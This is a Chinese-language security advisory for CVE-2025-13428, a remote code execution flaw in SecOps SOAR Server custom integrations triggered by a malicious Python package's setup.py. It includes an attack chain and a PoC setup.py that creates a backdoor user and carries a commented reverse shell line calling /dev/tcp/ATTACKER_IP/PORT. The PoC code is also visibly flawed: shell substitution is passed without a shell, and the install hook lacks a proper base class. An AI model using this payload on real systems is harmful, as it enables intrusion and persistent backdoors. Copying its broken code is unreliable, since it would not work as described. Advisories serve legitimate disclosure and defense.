CVE-2025-13428 CVSS 7.2 高危

CVE-2025-13428: SecOps SOAR服务器自定义集成功能远程代码执行漏洞

披露日期: 2025-12-09

来源: f45cbf4e-4146-4068-b7e1-655ffc2c548c

漏洞信息

漏洞编号

CVE-2025-13428

漏洞类型

远程代码执行（RCE）

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

SecOps SOAR Server

漏洞概述

CVE-2025-13428是SecOps SOAR服务器中发现的一个高危安全漏洞，CVSS评分达到7.2。该漏洞存在于服务器的自定义集成（Custom Integrations）功能中，源于对用户上传的Python包代码验证机制存在严重缺陷。攻击者利用此漏洞可以通过上传包含恶意代码的Python包，在服务器安装该包时执行任意代码，从而实现对服务器的完全控制。此漏洞需要攻击者具备有效的认证凭证并拥有特定的"IDE role"权限，属于高权限攻击场景。值得注意的是，官方已确认所有客户已自动升级至修复版本6.3.64或更高版本，无需客户手动干预。

技术细节

该漏洞的核心问题在于SecOps SOAR服务器的custom integrations功能对上传的Python包缺乏有效的安全验证机制。具体而言，服务器允许具有IDE角色的认证用户上传Python包供集成使用，但未对包内容进行充分的安全检查。攻击者可以构造一个包含恶意setup.py文件的Python包并上传。当服务器执行包安装流程时，会运行setup.py文件中的代码。由于setup.py在安装时具有执行权限，攻击者可以在其中植入任意系统命令或代码，从而在服务器上下文中执行。这使得攻击者能够完全控制服务器环境，包括访问敏感数据、修改系统配置、安装后门或进一步横向移动。漏洞的利用条件包括：攻击者需持有有效认证账户、账户需具备IDE role权限、能够访问custom integrations功能上传接口。

攻击链分析

STEP 1

步骤1

攻击者获取SecOps SOAR服务器的有效认证账户，并确认该账户拥有IDE role权限

STEP 2

步骤2

攻击者构造恶意Python包，在setup.py文件中植入后门代码或命令执行载荷

STEP 3

步骤3

通过SecOps SOAR服务器的custom integrations功能上传恶意Python包

STEP 4

步骤4

服务器在安装上传的Python包时自动执行setup.py文件中的恶意代码

STEP 5

步骤5

攻击者获得服务器环境下的代码执行权限，实现远程代码执行（RCE）或建立持久化后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Malicious setup.py for CVE-2025-13428 PoC
# This demonstrates the RCE vulnerability in SecOps SOAR custom integrations

from setuptools import setup
import subprocess
import os

# Attacker's payload - reverse shell or arbitrary command execution
def exploit():
    # Example: Create a backdoor user
    try:
        # Execute system command during package installation
        subprocess.Popen(['useradd', '-p', '$(openssl passwd -1 evil123)', 'hacker'], 
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # Or execute reverse shell
        # subprocess.Popen(['bash', '-i', '&>/dev/tcp/ATTACKER_IP/PORT', '0>&1'])
        
        # Write proof of compromise
        with open('/tmp/pwned_cve_2025_13428.txt', 'w') as f:
            f.write('System compromised via CVE-2025-13428\n')
            f.write(f'Attacker: {os.environ.get("USER", "unknown")}\n')
    except Exception as e:
        pass

setup(
    name='malicious-integration',
    version='1.0.0',
    author='Attacker',
    description='Malicious SecOps SOAR integration package',
    py_modules=[],
    # Execute payload during installation
    cmdclass={
        'install': type('EvilInstall', (), {
            'run': lambda self: exploit()
        })
    }
)

影响范围

SecOps SOAR Server < 6.3.64

防御指南

临时缓解措施

官方已确认所有客户已自动升级至安全版本6.3.64或更高版本，无需客户执行任何手动操作。对于无法立即升级的环境，建议暂时禁用custom integrations功能，限制IDE role权限分配，并加强对集成包上传接口的监控和审计。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13428
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13428
3 Details https://www.cvedetails.com/cve/CVE-2025-13428/
4 VulDB https://vuldb.com/cve/CVE-2025-13428
5 Link https://cloud.google.com/support/bulletins#gcp-2025-075

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表